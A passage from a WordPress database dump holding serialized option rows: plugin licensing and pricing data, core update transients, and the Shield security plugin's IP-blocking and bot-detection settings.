site.\";s:9:\"thumbnail\";s:61:\"https://cdn.thememylogin.com/uploads/edd/2018/05/profiles.png\";s:8:\"category\";b:0;s:4:\"tags\";a:1:{i:0;O:8:\"stdClass\":10:{s:7:\"term_id\";i:7;s:4:\"name\";s:6:\"legacy\";s:4:\"slug\";s:6:\"legacy\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:7;s:8:\"taxonomy\";s:12:\"download_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:6;s:6:\"filter\";s:3:\"raw\";}}}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"15.00\";s:8:\"2-5sites\";s:5:\"30.00\";s:14:\"unlimitedsites\";s:5:\"45.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:5:\"1.0.7\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}}','no'),(510147,'_transient_timeout_gform_update_info','1632371400','no'),(510148,'_transient_gform_update_info','a:5:{s:12:\"is_valid_key\";s:1:\"0\";s:15:\"expiration_time\";i:0;s:7:\"version\";s:5:\"1.7.9\";s:3:\"url\";s:0:\"\";s:9:\"offerings\";a:0:{}}','no'),(507667,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:3:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.8.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.8.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.8.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.8.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.8.1\";s:7:\"version\";s:5:\"5.8.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.6\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.8.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.8.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.8.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.8.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.8.1\";s:7:\"version\";s:5:\"5.8.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.6\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.7.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.7.3-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.7.3\";s:7:\"version\";s:5:\"5.7.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.6\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1632328152;s:15:\"version_checked\";s:5:\"5.6.5\";s:12:\"translations\";a:0:{}}','no'),(468214,'_site_transient_shield_mod_config_7e66eb2af2ac924a130c43f2966d5e86','a:10:{s:4:\"slug\";s:3:\"ips\";s:10:\"properties\";a:14:{s:4:\"slug\";s:3:\"ips\";s:4:\"name\";s:22:\"Block Bad IPs/Visitors\";s:12:\"sidebar_name\";s:11:\"IP Blocking\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:3:\"ips\";s:7:\"tagline\";s:68:\"Automatically detect bots and malicious visitors and stop them dead.\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:100;}s:10:\"menu_items\";a:1:{i:0;a:2:{s:5:\"title\";s:10:\"IP Manager\";s:4:\"slug\";s:12:\"ips-redirect\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:12:\"ips-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:3:\"ips\";}}}s:13:\"admin_notices\";a:1:{s:19:\"visitor-whitelisted\";a:5:{s:2:\"id\";s:19:\"visitor-whitelisted\";s:8:\"schedule\";s:10:\"conditions\";s:16:\"plugin_page_only\";b:1;s:8:\"per_user\";b:1;s:4:\"type\";s:4:\"info\";}}s:12:\"requirements\";a:1:{s:3:\"php\";a:2:{s:9:\"functions\";a:1:{i:0;s:10:\"filter_var\";}s:9:\"constants\";a:5:{i:0;s:18:\"FILTER_VALIDATE_IP\";i:1;s:16:\"FILTER_FLAG_IPV4\";i:2;s:16:\"FILTER_FLAG_IPV6\";i:3;s:25:\"FILTER_FLAG_NO_PRIV_RANGE\";i:4;s:24:\"FILTER_FLAG_NO_RES_RANGE\";}}}s:8:\"sections\";a:8:{i:0;a:6:{s:4:\"slug\";s:23:\"section_auto_black_list\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Automatic IP Black List\";s:11:\"title_short\";s:22:\"Auto IP Blocking Rules\";s:9:\"beacon_id\";i:208;s:7:\"summary\";a:2:{i:0;s:136:\"Purpose - The Automatic IP Black List system will block the IP addresses of naughty visitors after a specified number of transgressions.\";i:1;s:68:\"Recommendation - Keep the Automatic IP Black List feature turned on.\";}}i:1;a:3:{s:4:\"slug\";s:15:\"section_antibot\";s:5:\"title\";s:14:\"AntiBot System\";s:11:\"title_short\";s:14:\"AntiBot System\";}i:2;a:5:{s:4:\"slug\";s:14:\"section_logins\";s:5:\"title\";s:18:\"Capture Login Bots\";s:11:\"title_short\";s:10:\"Login Bots\";s:9:\"beacon_id\";i:122;s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:3;a:5:{s:4:\"slug\";s:14:\"section_probes\";s:5:\"title\";s:20:\"Capture Probing Bots\";s:11:\"title_short\";s:12:\"Probing Bots\";s:9:\"beacon_id\";i:123;s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:4;a:5:{s:4:\"slug\";s:18:\"section_behaviours\";s:5:\"title\";s:30:\"Identify Common Bot Behaviours\";s:11:\"title_short\";s:14:\"Bot Behaviours\";s:9:\"beacon_id\";i:124;s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:5;a:5:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:9:\"beacon_id\";i:139;s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:6;a:4:{s:4:\"slug\";s:33:\"section_enable_plugin_feature_ips\";s:5:\"title\";s:25:\"Enable Module: IP Manager\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:95:\"Purpose - The IP Manager allows you to whitelist, blacklist and configure auto-blacklist rules.\";i:1;s:123:\"Recommendation - Keep the IP Manager feature turned on. You should also carefully review the automatic black list settings.\";}}i:7;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:19:{i:0;a:11:{s:3:\"key\";s:10:\"enable_ips\";s:7:\"section\";s:33:\"section_enable_plugin_feature_ips\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/ea\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:9:\"beacon_id\";i:208;s:4:\"name\";s:17:\"Enable IP Manager\";s:7:\"summary\";s:41:\"Enable (or Disable) The IP Manager module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the IP Manager module\";}i:1;a:12:{s:3:\"key\";s:15:\"antibot_minimum\";s:7:\"section\";s:15:\"section_antibot\";s:7:\"default\";i:45;s:4:\"type\";s:7:\"integer\";s:3:\"min\";i:0;s:3:\"max\";i:99;s:9:\"link_info\";s:19:\"https://shsec.io/jy\";s:9:\"link_blog\";s:19:\"https://shsec.io/jz\";s:9:\"beacon_id\";i:424;s:4:\"name\";s:17:\"AntiBot Threshold\";s:7:\"summary\";s:38:\"AntiBot Testing Threshold (Percentage)\";s:11:\"description\";s:94:\"When using Shield\'s AntiBot system, this is the threshold used for testing (between 1 and 99).\";}i:2;a:11:{s:3:\"key\";s:31:\"antibot_high_reputation_minimum\";s:7:\"section\";s:15:\"section_antibot\";s:7:\"default\";i:200;s:4:\"type\";s:7:\"integer\";s:3:\"min\";i:0;s:9:\"link_info\";s:19:\"https://shsec.io/jy\";s:9:\"link_blog\";s:19:\"https://shsec.io/jz\";s:9:\"beacon_id\";i:431;s:4:\"name\";s:22:\"High Reputation Bypass\";s:7:\"summary\";s:67:\"Prevent IPs/Visitors With High Reputation Scores From Being Blocked\";s:11:\"description\";s:73:\"Ensures that visitors with a high reputation are never blocked by Shield.\";}i:3;a:10:{s:3:\"key\";s:19:\"transgression_limit\";s:7:\"section\";s:23:\"section_auto_black_list\";s:7:\"default\";i:10;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf24\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:9:\"beacon_id\";i:207;s:4:\"name\";s:13:\"Offense Limit\";s:7:\"summary\";s:72:\"Visitor IP address will be Black Listed after X bad actions on your site\";s:11:\"description\";s:280:\"A black mark is set against an IP address each time a visitor trips the defenses of the Shield plugin. When the number of these offenses exceeds specified limit, they are automatically blocked from accessing the site. Set this to 0 to turn off the Automatic IP Black List feature.\";}i:4;a:12:{s:3:\"key\";s:11:\"auto_expire\";s:7:\"section\";s:23:\"section_auto_black_list\";s:8:\"advanced\";b:1;s:7:\"default\";s:3:\"day\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:6:\"minute\";s:4:\"text\";s:6:\"Minute\";}i:1;a:2:{s:9:\"value_key\";s:4:\"hour\";s:4:\"text\";s:4:\"Hour\";}i:2;a:2:{s:9:\"value_key\";s:3:\"day\";s:4:\"text\";s:3:\"Day\";}i:3;a:2:{s:9:\"value_key\";s:4:\"week\";s:4:\"text\";s:4:\"Week\";}i:4;a:2:{s:9:\"value_key\";s:5:\"month\";s:4:\"text\";s:5:\"Month\";}}s:9:\"link_info\";s:23:\"https://shsec.io/wpsf25\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:9:\"beacon_id\";i:210;s:4:\"name\";s:21:\"Auto Block Expiration\";s:7:\"summary\";s:65:\"After 1 \'X\' a black listed IP will be removed from the black list\";s:11:\"description\";s:249:\"Permanent and lengthy IP Black Lists are harmful to performance. You should allow IP addresses on the black list to be eventually removed over time. Shorter IP black lists are more efficient and a more intelligent use of an IP-based blocking system.\";}i:5;a:13:{s:3:\"key\";s:17:\"user_auto_recover\";s:7:\"section\";s:23:\"section_auto_black_list\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:15:\"multiple_select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:4:\"gasp\";s:4:\"text\";s:26:\"With Shield Bot Protection\";}i:1;a:2:{s:9:\"value_key\";s:5:\"email\";s:4:\"text\";s:44:\"Magic Email Links To Unblock Logged-In Users\";}}s:9:\"link_info\";s:19:\"https://shsec.io/f8\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:125;s:4:\"name\";s:17:\"User Auto Unblock\";s:7:\"summary\";s:34:\"Allow Visitors To Unblock Their IP\";s:11:\"description\";s:73:\"Allow visitors blocked by the plugin to automatically unblock themselves.\";}i:6;a:12:{s:3:\"key\";s:17:\"request_whitelist\";s:7:\"section\";s:23:\"section_auto_black_list\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/gd\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:126;s:4:\"name\";s:22:\"Request Path Whitelist\";s:7:\"summary\";s:22:\"Request Path Whitelist\";s:11:\"description\";s:23:\"Request Path Whitelist.\";}i:7;a:12:{s:3:\"key\";s:16:\"text_loginfailed\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/e8\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:139;s:4:\"name\";s:12:\"Login Failed\";s:7:\"summary\";s:62:\"Visitor Triggers The IP Offenses System Through A Failed Login\";s:11:\"description\";s:63:\"This message is displayed if the visitor fails a login attempt.\";}i:8;a:12:{s:3:\"key\";s:9:\"track_404\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:123;s:4:\"name\";s:10:\"404 Detect\";s:7:\"summary\";s:33:\"Identify A Bot When It Hits A 404\";s:11:\"description\";s:53:\"Detect When A Visitor Browses To A Non-Existent Page.\";}i:9;a:12:{s:3:\"key\";s:16:\"track_linkcheese\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f6\";s:9:\"beacon_id\";i:123;s:4:\"name\";s:11:\"Link Cheese\";s:7:\"summary\";s:38:\"Tempt A Bot With A Fake Link To Follow\";s:11:\"description\";s:45:\"Detect A Bot That Follows A \'no-follow\' Link.\";}i:10;a:12:{s:3:\"key\";s:12:\"track_xmlrpc\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:123;s:4:\"name\";s:14:\"XML-RPC Access\";s:7:\"summary\";s:39:\"Identify A Bot When It Accesses XML-RPC\";s:11:\"description\";s:53:\"If you don\'t use XML-RPC, why would anyone access it?\";}i:11;a:12:{s:3:\"key\";s:19:\"track_invalidscript\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:123;s:4:\"name\";s:19:\"Invalid Script Load\";s:7:\"summary\";s:63:\"Identify A Bot Attempts To Load WordPress In A Non-Standard Way\";s:11:\"description\";s:60:\"WordPress should only be loaded in a limited number of ways.\";}i:12;a:11:{s:3:\"key\";s:17:\"track_loginfailed\";s:7:\"section\";s:14:\"section_logins\";s:7:\"default\";s:20:\"transgression-single\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fn\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:122;s:4:\"name\";s:12:\"Failed Login\";s:7:\"summary\";s:47:\"Detect Failed Login Attempts By Valid Usernames\";s:11:\"description\";s:61:\"Penalise a visitor who fails to login using a valid username.\";}i:13;a:12:{s:3:\"key\";s:18:\"track_logininvalid\";s:7:\"section\";s:14:\"section_logins\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fn\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:122;s:4:\"name\";s:17:\"Invalid Usernames\";s:7:\"summary\";s:30:\"Detect Invalid Username Logins\";s:11:\"description\";s:67:\"Identify A Bot When It Tries To Login With A Non-Existent Username.\";}i:14;a:12:{s:3:\"key\";s:20:\"track_fakewebcrawler\";s:7:\"section\";s:18:\"section_behaviours\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/f5\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:206;s:4:\"name\";s:16:\"Fake Web Crawler\";s:7:\"summary\";s:34:\"Detect Fake Search Engine Crawlers\";s:11:\"description\";s:89:\"Identify a Bot when it presents as an official web crawler, but analysis shows it\'s fake.\";}i:15;a:12:{s:3:\"key\";s:15:\"track_useragent\";s:7:\"section\";s:18:\"section_behaviours\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fi\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:124;s:4:\"name\";s:17:\"Empty User Agents\";s:7:\"summary\";s:38:\"Detect Requests With Empty User Agents\";s:11:\"description\";s:62:\"Identify a request as a bot if the user agent is not provided.\";}i:16;a:12:{s:3:\"key\";s:19:\"text_remainingtrans\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/e9\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:139;s:4:\"name\";s:18:\"Remaining Offenses\";s:7:\"summary\";s:64:\"Visitor Triggers The IP Offenses System Through A Firewall Block\";s:11:\"description\";s:132:\"This message is displayed if the visitor triggered the IP Offenses system and reports how many offenses remain before being blocked.\";}i:17;a:5:{s:3:\"key\";s:15:\"autounblock_ips\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:18;a:5:{s:3:\"key\";s:20:\"autounblock_emailids\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:6:{s:18:\"allowable_ext_404s\";a:10:{i:0;s:2:\"js\";i:1;s:3:\"css\";i:2;s:3:\"gif\";i:3;s:3:\"jpg\";i:4;s:4:\"jpeg\";i:5;s:3:\"png\";i:6;s:3:\"map\";i:7;s:3:\"ttf\";i:8;s:4:\"woff\";i:9;s:5:\"woff2\";}s:10:\"db_classes\";a:2:{s:10:\"botsignals\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\BotSignals\\Handler\";s:8:\"ip_lists\";s:62:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\IPs\\Handler\";}s:19:\"ip_lists_table_name\";s:8:\"ip_lists\";s:17:\"db_table_ip_lists\";a:3:{s:4:\"slug\";s:8:\"ip_lists\";s:11:\"cols_custom\";a:6:{s:2:\"ip\";s:76:\"varchar(60) NOT NULL DEFAULT \'\' COMMENT \'Human readable IP address or range\'\";s:5:\"label\";s:54:\"varchar(255) NOT NULL DEFAULT \'\' COMMENT \'Description\'\";s:4:\"list\";s:56:\"varchar(4) NOT NULL DEFAULT \'\' COMMENT \'Block or Bypass\'\";s:3:\"ip6\";s:56:\"tinyint(1) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Is IPv6\'\";s:8:\"is_range\";s:57:\"tinyint(1) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Is Range\'\";s:14:\"transgressions\";s:60:\"int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Total Offenses\'\";}s:15:\"cols_timestamps\";a:2:{s:14:\"last_access_at\";s:17:\"Last Access By IP\";s:10:\"blocked_at\";s:10:\"IP Blocked\";}}s:19:\"db_table_botsignals\";a:6:{s:10:\"autoexpire\";i:3;s:4:\"slug\";s:10:\"botsignals\";s:14:\"col_older_than\";s:10:\"updated_at\";s:14:\"has_updated_at\";b:1;s:11:\"cols_custom\";a:1:{s:2:\"ip\";s:47:\"varbinary(16) DEFAULT NULL COMMENT \'IP Address\'\";}s:15:\"cols_timestamps\";a:25:{s:9:\"notbot_at\";s:6:\"NotBot\";s:12:\"frontpage_at\";s:24:\"Any Frontend Page Loaded\";s:12:\"loginpage_at\";s:17:\"Login Page Loaded\";s:8:\"bt404_at\";s:12:\"BotTrack 404\";s:9:\"btfake_at\";s:23:\"BotTrack FakeWebCrawler\";s:11:\"btcheese_at\";s:19:\"BotTrack LinkCheese\";s:14:\"btloginfail_at\";s:20:\"BotTrack LoginFailed\";s:7:\"btua_at\";s:23:\"BotTrack Useragent Fail\";s:8:\"btxml_at\";s:22:\"BotTrack XMLRPC Access\";s:17:\"btlogininvalid_at\";s:21:\"BotTrack LoginInvalid\";s:18:\"btinvalidscript_at\";s:22:\"BotTrack InvalidScript\";s:11:\"cooldown_at\";s:18:\"Triggered Cooldown\";s:12:\"humanspam_at\";s:28:\"Comment Marked As Human SPAM\";s:11:\"markspam_at\";s:20:\"Mark Comment As SPAM\";s:13:\"unmarkspam_at\";s:22:\"Unmark Comment As SPAM\";s:14:\"captchapass_at\";s:14:\"Captcha Passed\";s:14:\"captchafail_at\";s:14:\"Captcha Failed\";s:7:\"auth_at\";s:16:\"Successful Login\";s:11:\"firewall_at\";s:18:\"Triggered Firewall\";s:12:\"ratelimit_at\";s:19:\"Rate Limit Exceeded\";s:10:\"offense_at\";s:12:\"Last Offense\";s:10:\"blocked_at\";s:10:\"Last Block\";s:12:\"unblocked_at\";s:9:\"Unblocked\";s:9:\"bypass_at\";s:6:\"Bypass\";s:9:\"snsent_at\";s:17:\"Sent To ShieldNET\";}}s:6:\"events\";a:21:{s:14:\"custom_offense\";a:2:{s:3:\"cat\";i:3;s:7:\"offense\";b:1;}s:9:\"conn_kill\";a:1:{s:3:\"cat\";i:3;}s:10:\"ip_offense\";a:1:{s:3:\"cat\";i:2;}s:10:\"ip_blocked\";a:1:{s:3:\"cat\";i:2;}s:10:\"ip_unblock\";a:3:{s:7:\"offense\";b:0;s:5:\"audit\";b:0;s:4:\"stat\";b:0;}s:13:\"ip_block_auto\";a:3:{s:7:\"offense\";b:0;s:4:\"stat\";b:0;s:3:\"cat\";i:1;}s:15:\"ip_block_manual\";a:3:{s:7:\"offense\";b:0;s:4:\"stat\";b:0;s:3:\"cat\";i:1;}s:13:\"ip_bypass_add\";a:3:{s:7:\"offense\";b:0;s:4:\"stat\";b:0;s:3:\"cat\";i:1;}s:16:\"ip_bypass_remove\";a:3:{s:7:\"offense\";b:0;s:4:\"stat\";b:0;s:3:\"cat\";i:1;}s:15:\"ip_unblock_flag\";a:1:{s:3:\"cat\";i:1;}s:15:\"bottrack_notbot\";a:4:{s:3:\"cat\";i:0;s:7:\"offense\";b:0;s:5:\"audit\";b:0;s:4:\"stat\";b:0;}s:12:\"bottrack_404\";a:2:{s:3:\"cat\";i:1;s:7:\"offense\";b:1;}s:23:\"bottrack_fakewebcrawler\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:19:\"bottrack_linkcheese\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:20:\"bo